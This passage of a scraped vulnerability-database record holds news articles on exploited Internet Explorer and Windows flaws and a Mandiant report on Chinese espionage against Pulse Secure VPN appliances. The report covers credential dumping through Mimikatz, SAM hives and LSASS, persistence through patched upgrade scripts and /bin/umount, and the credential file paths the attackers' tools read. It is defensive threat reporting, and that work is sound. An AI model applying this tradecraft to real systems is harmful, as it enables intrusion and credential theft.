"[![Malware](https://thehackernews.com/images/-QrNW2pGZsXM/YRzFeUzLNRI/AAAAAAAADkA/5jruQy-AgDkRdhW-7PzZoHP3-W90X5EowCLcBGAsYHQ/s728-e1000/north-korea.jpg)](<https://thehackernews.com/images/-QrNW2pGZsXM/YRzFeUzLNRI/AAAAAAAADkA/5jruQy-AgDkRdhW-7PzZoHP3-W90X5EowCLcBGAsYHQ/s0/north-korea.jpg>)\n\nA North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.\n\nCybersecurity firm Volexity [attributed](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) the watering hole attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021.\n\nThe \"clever disguise of exploit code amongst legitimate code\" and the use of custom malware enables the attackers to avoid detection, Volexity researchers said.\n\nThe attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in [August 2020](<https://thehackernews.com/2020/08/microsoft-software-patches.html>) and [March 2021](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>). Successful exploitation resulted in the deployment of a Cobalt Strike stager and novel backdoor called BLUELIGHT. \n\n * [CVE-2020-1380](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-1380>) (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability\n * [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability\n\nIt's worth noting that both the flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.\n\n[![](https://thehackernews.com/images/-E1lELfCsvpg/YRzEM-DMMLI/AAAAAAAADj4/gtN3LyfaO0MLnrYMwpl1LkoMvGFkm1TXACLcBGAsYHQ/s0/exploit.jpg)](<https://thehackernews.com/images/-E1lELfCsvpg/YRzEM-DMMLI/AAAAAAAADj4/gtN3LyfaO0MLnrYMwpl1LkoMvGFkm1TXACLcBGAsYHQ/s0/exploit.jpg>)\n\nIn a [separate set of attacks](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan (RAT) on compromised Windows systems.\n\nBLUELIGHT is used as a secondary payload following the successful delivery of Cobalt Strike, functioning as a full-featured remote access tool that provides complete access to a compromised system.\n\nIn addition to gathering system metadata and information about installed antivirus products, the malware is capable of executing shellcode, harvesting cookies and passwords from Internet Explorer, Microsoft Edge, and Google Chrome browsers, collecting files and downloading arbitrary executables, the results of which are exfiltrated to a remote server.\n\n\"While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,\" the researchers noted. \"The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-18T08:33:00", "type": "thn", "title": "NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-08-18T14:51:37", "id": "THN:FA6A50184463DFCD20073D5EDD0F36F2", "href": "https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[![Windows Vulnerability](https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[![Windows Vulnerability Exploit](https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf>)\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, concerns a case of elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-07T05:03:44", "id": "THN:012EBB2FE2687F178FBCC3AB8ABEF778", "href": "https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2021-10-29T03:23:15", "description": "On April 20, 2021, Mandiant published detailed results of our investigations into compromised Pulse Secure devices by suspected Chinese espionage operators. This blog post is intended to provide an update on our findings, give additional recommendations to network defenders, and discuss potential implications for U.S.-China strategic relations.\n\n * Mandiant continues to gather evidence and respond to intrusions involving compromises of Pulse Secure VPN appliances at organizations across the defense, government, high tech, transportation, and financial sectors in the U.S. and Europe (Figure 1).\n * Reverse engineers on the FLARE team have identified four additional code families specifically designed to manipulate Pulse Secure devices. \n * We now assess that espionage activity by UNC2630 and UNC2717 supports key Chinese government priorities. Many compromised organizations operate in verticals and industries aligned with Beijing\u2019s strategic objectives outlined in China\u2019s recent 14th Five Year Plan.\n * While there is evidence of data theft at many organizations, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi [agreement](<https://obamawhitehouse.archives.gov/the-press-office/2015/09/25/fact-sheet-president-xi-jinpings-state-visit-united-states>).\n * Mandiant Threat Intelligence assesses that Chinese cyber espionage activity has demonstrated a higher tolerance for risk and is less constrained by diplomatic pressures than previously characterized.\n![Organizations with compromised Pulse Secure devices by vertical and geographic location](https://www.fireeye.com/sites/default/files/inline-images/pulse-update1.png)Figure 1: Organizations with compromised Pulse Secure devices by vertical and geographic location\n\nPulse Secure continues to work closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues. Pulse Secure\u2019s parent company, Ivanti, has released patches to proactively address software vulnerabilities and issued updated [Security Advisories](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) and [Knowledge Articles](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to assist customers. (Please see the Forensics, Remediation, and Hardening Guidelines section for additional details.)\n\n#### UNC2630 and UNC2717 Tradecraft and Response to Disclosure\n\nMandiant is tracking 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyber espionage groups which we believe are affiliated with the Chinese government. Between April 17 and April 20, 2021, Mandiant incident responders observed UNC2630 access dozens of compromised devices and remove webshells like ATRIUM and SLIGHTPULSE.\n\n * Under certain conditions, the Integrity Checker Tool (ICT) will show no evidence of compromise on appliances which may have had historical compromise. This false negative may be returned because the ICT cannot scan the rollback partition. If a backdoor or persistence patcher exists on the rollback partition and a Pulse Secure appliance is rolled back to the prior version, the backdoor(s) will be present on the appliance. Please see the Forensics, Remediation, and Hardening Guidelines section for important information regarding the ICT and upgrade process.\n * In at least one instance, UNC2630 deleted their webshell(s) but did not remove the persistence patcher, making it possible to regain access when the device was upgraded. The remaining persistence patcher causes the malicious code to be executed later during a system upgrade, re-inserts webshell logic into various files on the appliance, and recompromises the device.\n * It is unusual for Chinese espionage actors to remove a large number of backdoors across several victim environments on or around the time of public disclosure. This action displays an interesting concern for operational security and a sensitivity to publicity.\n\nBoth UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration. They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\n\n#### Updates from Incident Response Investigations\n\nWe continue to suspect that multiple groups including UNC2630 and UNC2717 are responsible for this activity, despite the use of similar exploits and tools. There is a high degree of variation in attacker actions within victim environments, with actors inconsistently using a combination of tools and command and control IP addresses.\n\nReverse engineers on the FLARE team have identified four additional malware families specifically designed to manipulate Pulse Secure devices (Table 1). These utilities have similar functions to the 12 previously documented malware families: harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence. Please see the Technical Annex for detailed analysis of these code families.\n\n**Malware Family**\n\n| \n\n**Description**\n\n| \n\n**Actor** \n \n---|---|--- \n \nBLOODMINE\n\n| \n\nBLOODMINE is a utility for parsing Pulse Secure Connect log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file.\n\n| \n\nUNC2630 \n \nBLOODBANK\n\n| \n\nBLOODBANK is a credential theft utility that parses two files containing password hashes or plaintext passwords and expects an output file to be given at the command prompt.\n\n| \n\nUNC2630 \n \nCLEANPULSE\n\n| \n\nCLEANPULSE is a memory patching utility that may be used to prevent certain log events from occurring. It was found in close proximity to an ATRIUM webshell.\n\n| \n\nUNC2630 \n \nRAPIDPULSE\n\n| \n\nRAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file. RAPIDPULSE can serve as an encrypted file downloader for the attacker.\n\n| \n\nUNC2630 \n \nTable 1: New malware families identified\n\n_Initial Compromise_\n\nThe actors leveraged several vulnerabilities in Pulse Secure VPN appliances. Mandiant observed the use of the recently patched vulnerability CVE-2021-22893 to compromise fully patched Pulse Secure appliances as well as previously disclosed vulnerabilities from 2019 and 2020. In many cases, determining the initial exploitation vector and timeframe was not possible to determine because the actors altered or deleted forensic evidence, or the appliance had undergone subsequent code upgrades thereby destroying evidence related to the initial exploitation.\n\n_Establish Foothold_\n\nIn some cases, Mandiant observed the actors create their own Local Administrator account outside of established credential management controls on Windows servers of strategic value. This allowed the actor to maintain access to systems with short-cycle credential rotation policies and provided a sufficient level of access to operate freely within their target environment. The actors also maintained their foothold into the targeted environments exclusively through Pulse Secure webshells and malware without relying on backdoors deployed on internal Windows or Linux endpoints.\n\n_Escalate Privileges_\n\nMandiant observed the actors use three credential harvesting techniques on Windows systems:\n\n * Targeting of clear text passwords and hashes from memory using the credential harvesting tool Mimikatz. Instead of being copied locally and executed on the target system, Mandiant saw evidence of the Mimikatz binary on the source system of an RDP session (i.e. the threat actor\u2019s system that was connected to the VPN) through an RDP mapped drive.\n * Copying and exfiltration of the SAM, SECURITY, and SYSTEM registry hives which contained cached NTLM hashes for Local and Domain accounts.\n * Leveraging the Windows Task Manager process to target the Local Security Authority Subsystem Service (LSASS) process memory for NTLM hashes.\n\nIn addition to these privilege escalation techniques, the actors specifically targeted separate privileged accounts belonging to individuals whose unprivileged accounts were previously compromised (likely through the Pulse Secure credential harvesting malware families). It is unclear how the account associations were made by the actor.\n\n_Internal Reconnaissance_\n\nMandiant found evidence that the actors renamed their own workstations that they connected to the VPN of victim networks to mimic the naming convention of their target environment. This practice aligns with the actor\u2019s objective for long-term persistence and evading detection and demonstrates a familiarity with the internal hostnames in the victim environment.\n\nThe actors operated solely by utilizing Windows-based utilities to carry out tasks. Some of the utilities observed were net.exe, quser.exe, powershell.exe, powershell_ise.exe, findstr.exe, netstat.exe, cmd.exe, reg.exe and tasklist.exe.\n\n_Move Laterally_\n\nMost lateral movement originated from compromised Pulse Secure VPN appliances to internal systems within the environment. While connected to the Pulse VPN appliance, the actor\u2019s system was assigned an IP address from the Pulse VPN DHCP pool and they moved laterally throughout the environments by leveraging the Remote Desktop Protocol (RDP), the Secure Shell Protocol (SSH), and browser-based communication to HTTPS hosted resources. The actors also accessed other resources such as Microsoft M365 cloud environments using stolen credentials they had previously acquired.\n\nMandiant also observed the actors targeting ESXi host servers. The actor enabled SSH on ESXi hosts that were previously disabled via the web interface. When their operations on the system were finished, the actors disabled SSH on the ESXi host again and cleared or preemptively disabled all relevant logging associated with the performed activities. This includes authentication, command history, and message logging on the system.\n\n_Maintain Presence_\n\nMandiant observed the threat actor maintain persistence by compromising the upgrade process on the Pulse Secure Appliance. Persistence was primarily achieved by modifying the legitimate DSUpgrade.pm file to install the ATRIUM webshell across each upgrade performed by an administrator. The actor likely chose DSUpgade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is applied during updates. The patcher modifies content in /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the actor to maintain access to the system across updates.\n\nThe actors also achieved persistence in other cases by prepending a bash script to the file /bin/umount normally used to unmount a Linux filesystem. This binary was targeted by the actor because it is executed by the Pulse Secure appliance during a system upgrade. The actor\u2019s script verifies that the umount binary executes with a specific set of arguments, which are identical to the arguments used by the Pulse Secure appliance to executes the binary. The inserted malicious bash script remounts the filesystem as read-write and iterates through a series of bash routines to inject the ATRIUM webshell, hide SLOWPULSE from a legacy file integrity bash script, remove or add itself from the umount file, and validate the web process was running after a reboot to return the filesystem back to read-only.\n\n_Complete Mission_\n\nThe threat actor\u2019s objectives appear to be stealing credentials, maintaining long-term persistent access to victim networks, and accessing or exfiltrating sensitive data. Mandiant has observed the attackers:\n\n * Staging data related to sensitive projects, often in C:\\Users\\Public\n * Naming exfiltration archives to resemble Windows Updates (KB) or to match the format KB<digits>.zip\n * Using the JAR/ZIP file format for data exfiltration\n * Deleting exfiltrated archives\n\nAnalysis of new malware families is included in the Technical Annex to enable defenders to quickly assess if their respective appliances have been affected. Relevant MITRE ATT&CK techniques, Yara rules and hashes are published on [Mandiant\u2019s GitHub page](<https://github.com/mandiant/pulsesecure_exploitation_countermeasures>).\n\n#### Forensics, Remediation, and Hardening Guidelines\n\nTo begin an investigation, Pulse Secure users should contact their Customer Support Representative for assistance completing the following steps:\n\n 1. Capture memory and a forensic image of the appliance\n 2. Run the Pulse Integrity Checker Tool found online\n 3. Request a decrypted image of each partition and a memory dump\n\nTo remediate a compromised Pulse Secure appliance: \n\n 1. Caution must be taken when determining if a Pulse Secure device was compromised at any previous date. If the Integrity Checker Tool (ICT) was not run before the appliance was updated, the only evidence of compromise will exist in the system rollback partition which cannot be scanned by the ICT. If an upgrade was performed without first using the ICT, a manual inspection of the rollback partition is required to determine if the device was previously compromised.\n 2. To ensure that no malicious logic is copied to a clean device, users must perform upgrades from the appliance console rather than the web interface. The console upgrade process follows a separate code path that will not execute files such as DSUpgrade.pm.\n 3. Previous versions of the ICT will exit if run on an unsupported software version. For every ICT scan, ensure that the ICT would have supported the device's version number.\n 4. Reset all passwords in the environment.\n 5. Upgrade to the most recent software version.\n\nTo secure the appliance and assist with future investigations, consider implementing the following:\n\n 1. Enable unauthenticated logging and configure syslog for Events, User & Admin Access\n 2. Forward all logs to a central log repository\n 3. Review logs for unusual authentications and evidence of exploitation\n 4. Regularly run the Integrity Checker Tool\n 5. Apply patches as soon as they are made available\n\n#### Geopolitical Context and Implications for U.S.-China Relations\n\nIn collaboration with intelligence analysts at BAE Systems Applied Intelligence, Mandiant has identified dozens of organizations across the defense, government, telecommunications, high tech, education, transportation, and financial sectors in the U.S. and Europe that have been compromised via vulnerabilities in Pulse Secure VPNs. Historic Mandiant and BAE investigations identified a significant number of these organizations as previous APT5 targets.\n\nNotably, compromised organizations operate in verticals and industries aligned with Beijing\u2019s strategic objectives as outlined in China\u2019s 14th Five Year Plan. Many manufacturers also compete with Chinese businesses in the high tech, green energy, and telecommunications sectors. Despite this, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.\n\nTargets of Chinese cyber espionage operations are often selected for their alignment with national strategic goals, and there is a strong correlation between pillar industries listed in policy white papers and targets of Chinese cyber espionage activity.\n\nChina has outlined eight key areas of vital economic interest for development and production which it views as essential to maintaining global competitiveness, under the following categories: energy, healthcare, railway transportation, telecommunications, national defense and stability, advanced manufacturing, network power, and sports and culture.\n\n_Historical Context_\n\nIn the [_Red Line Drawn_](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-china-espionage.pdf>)_ _report, Mandiant documented a significant decline in the volume of Chinese cyberespionage activity in 2014 and assessed that the restructuring of China's military and civilian intelligence agencies significantly impacted Chinese cyber operations. Then, in September 2015, President Xi of China concluded a bilateral agreement with U.S. President Obama to prohibit state-sponsored theft of intellectual property for the purpose of providing commercial advantage. Commercial IP theft has historically been a prominent characteristic of Chinese cyber espionage activity.\n\nIn 2018 we conducted an extensive [review](<https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-executive-s05-redline-redrawn.pdf>) of Chinese cyber espionage operations, both before and after the official announcement of the PLA reforms and bilateral agreement to determine if there were any corresponding changes in the tactics, techniques, and procedures (TTPs) used during Chinese cyberespionage operations. We observed two important changes in the type of information stolen and the geographic distribution of the targets.\n\n * Despite examining hundreds of incidents from January 2016 through mid 2019, we did not find definitive evidence of purely commercial application intellectual property theft in the US. Recent [indictments](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>) by the US Department of Justice suggest that this theft did occur. While we observed other malicious activity, including geopolitical targeting, theft of intellectual property with military applications, and theft of confidential business information, we did not find evidence that these cyber operations violated the Obama-Xi agreement.\n * Between January 2016 and mid-2019, the geographic focus of Chinese cyber operations shifted dramatically to Asia and away from the U.S. and Europe. While the U.S. remained the single most frequently targeted country, it became a much smaller percentage of observed activity. From 2012\u20132015, U.S. targeting constituted nearly 70 percent of all observed Chinese cyber espionage, while from January 2016 through August 2019, U.S. targeting fell to approximately 20 percent of Chinese activity. Targeting of Europe represented a similar proportion of overall Chinese activity to targeting of the Americas.\n\n_Changes in Chinese Espionage Activity between 2019 and 2021_\n\nBased on developments observed between 2019-2021, Mandiant Threat Intelligence assesses that most Chinese APT actors now concentrate on lower-volume but more-sophisticated, stealthier operations collecting strategic intelligence to support Chinese strategic political, military, and economic goals. While some of the technical changes may be the result of the restructuring of China's military and civilian organizations, some changes possibly reflect larger technical trends in cyber operations overall.\n\n * Before the reorganization, it was common to observe multiple Chinese espionage groups targeting the same organization, often targeting the same types of information. Post-2015, this duplication of efforts is rare.\n * Chinese espionage groups developed more efficient and purposeful targeting patterns by transitioning away from spearphishing and relying on end user software vulnerabilities and instead began exploiting networking devices and web facing applications in novel ways. Chinese APT actors also began to leverage supply chain vulnerabilities and to target third party providers to gain access to primary targets.\n * Recently observed Chinese cyber espionage activity exhibits an increased diligence in operational security, familiarity with network defender investigation techniques, and cognizance of the forensic evidence they leave behind.\n * We observe the resurgence of older Chinese espionage groups, including APT4 and APT5 after long periods of dormancy and currently active groups engage in frequent and widespread campaigns.\n\n_Redline Withdrawn?_\n\nThe Obama-Xi agreement prohibits the theft of intellectual property with purely commercial applications for the purpose of gaining a competitive advantage. It does not cover government or diplomatic information, sensitive business communications, IT data, PII, or intellectual property with military or dual use applications.\n\n * We have direct evidence of UNC2630, UNC2717 and other Chinese APT actors stealing credentials, email communications, and intellectual property with dual commercial and military applications.\n * Throughout our investigations, we did not directly observe the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.\n\nGiven the narrow definition of commercial intellectual property theft and the limited availability of forensic evidence, it is possible that our assessment will change with the discovery of new information.\n\nEvidence collected by Mandiant over the past decade suggests that norms and diplomatic agreements do not significantly limit China's use of its cyber threat capabilities, particularly when serving high-priority missions.\n\nThe greater ambition and risk tolerance demonstrated by Chinese policymakers since 2019 indicates that the tempo of Chinese state-sponsored activity may increase in the near future and that the Chinese cyber threat apparatus presents a renewed and serious threat to US and European commercial entities.\n\n#### Acknowledgements\n\nMandiant would like to thank analysts at BAE Systems Applied Intelligence, Stroz Friedberg, and Pulse Secure for their hard work, collaboration and partnership. The team would also like to thank Scott Henderson, Kelli Vanderlee, Jacqueline O'Leary, Michelle Cantos, and all the analysts who worked on Mandiant\u2019s _Red Line Redrawn_ project. The team would also like to thank Mike Dockry, Josh Villanueva, Keith Knapp, and all the incident responders who worked on these engagements.\n\n#### Additional Resources\n\n * [CISA Alert (AA21-110A): Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa-21-110a>)\n * [Pulse Secure Advisory SA44101: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [Pulse Secure Advisory SA44784: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>)\n * [Pulse Secure Customer FAQ KB44764: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)\n * [Pulse Secure KB44755: Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>)\n\n#### Detecting the Techniques\n\nThe following table contains specific FireEye product detection names for the malware families associated with this updated information.\n\n**Platform(s)**\n\n| \n\n**Detection Name** \n \n---|--- \n \nNetwork Security\n\nEmail Security\n\nDetection On Demand\n\nMalware File Scanning\n\nMalware File Storage Scanning\n\n| \n\n * FE_APT_Tool_Linux32_BLOODMINE_1\n * FE_APT_Tool_Linux_BLOODMINE_1\n * FE_APT_Tool_Linux32_BLOODBANK_1\n * FE_APT_Tool_Linux_BLOODBANK_1\n * FE_APT_Tool_Linux32_CLEANPULSE_1\n * FE_APT_Tool_Linux_CLEANPULSE_1\n * FE_APT_Webshell_PL_RAPIDPULSE_1\n * FEC_APT_Webshell_PL_RAPIDPULSE_1 \n \nEndpoint Security\n\n| \n\n**Real-Time Detection (IOC)**\n\n * BLOODBANK (UTILITY)\n * BLOODMINE (UTILITY) \n \nHelix\n\n| \n\n**Establish Foothold**\n\n * WINDOWS METHODOLOGY [User Account Created]\n * WINDOWS METHODOLOGY [User Created - Net Command]\n\n**Escalate Privileges**\n\n * WINDOWS METHODOLOGY [Mimikatz Args]\n * WINDOWS METHODOLOGY [Invoke-Mimikatz Powershell Artifacts]\n * WINDOWS METHODOLOGY [LSASS Memory Access]\n * WINDOWS METHODOLOGY [LSASS Generic Dump Activity]\n\n**Internal Reconnaissance**\n\n * WINDOWS ANALYTICS [Recon Commands]\n\n**Move Laterally**\n\n * WINDOWS ANALYTICS [Abnormal RDP Logon]\n * OFFICE 365 ANALYTICS [Abnormal Logon] \n \n#### Technical Annex\n\n_BLOODMINE_\n\nBLOODMINE is a utility for parsing Pulse Secure Connect log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file.\n\nThe sample takes three command line arguments\n\n 1. Filename to read\n 2. Filename to write\n 3. Timeout interval\n\nIt parses the input file for login status codes:\n\nAUT31504 \n \n--- \n \nAUT24414 \n \nAUT22673 \n \nAUT22886 \n \nAUT23574 \n \nIt parses the input file for web results code WEB20174. If it finds a web result code, it looks for file extensions:\n\n.css \n \n--- \n \n.jpg \n \n.png \n \n.gif \n \n.ico \n \n.js \n \n.jsp \n \nThese strings indicate the type of data that is collected from web requests:\n\nWeb login, IP: %s, User: %s, Realm: %s, Roles: %s, Browser: %s \n \n--- \n \nAgent login, IP: %s, User: %s, Realm: %s, Roles: %s, Client: %s \n \nLogout, IP: %s, User: %s, Realm: %s, Roles: %s \n \nSession end, IP: %s, User: %s, Realm: %s, Roles: %s \n \nNew session, IP: %s, User: %s, Realm: %s, Roles: %s, New IP: %s \n \nHost check, Policy: %s \n \nWebRequest completed, IP: %s, User: %s, Realm: %s, Roles: %s, %s to %s://%s:%s/%s from %s \n \n_BLOODBANK_\n\nBLOODBANK is a credential theft utility that parses two LMDB (an in memory database) files and expects an output file to be given at the command prompt. BLOODBANK takes advantage of a legitimate process that supports Single Sign On functionality and looks for plaintext passwords when they are briefly loaded in memory.\n\nThe utility parses the following two files containing password hashes or plaintext passwords:\n\n * /home/runtime/mtmp/lmdb/data0/data.mdb\n * /home/runtime/mtmp/system\n\nBLOODBANK expects an output file as a command line parameter, otherwise it prints file open error. It contains the following strings which it likely tries to extract and target.\n\nPRIMARY \n \n--- \n \nSECONDARY \n \nremoteaddr \n \nuser@ \n \nlogicUR \n \nlogicTim \n \npassw@ \n \nuserAge \n \nrealm \n \nSourc \n \n_CLEANPULSE_\n\nCLEANPULSE is a memory patching utility that may be used to 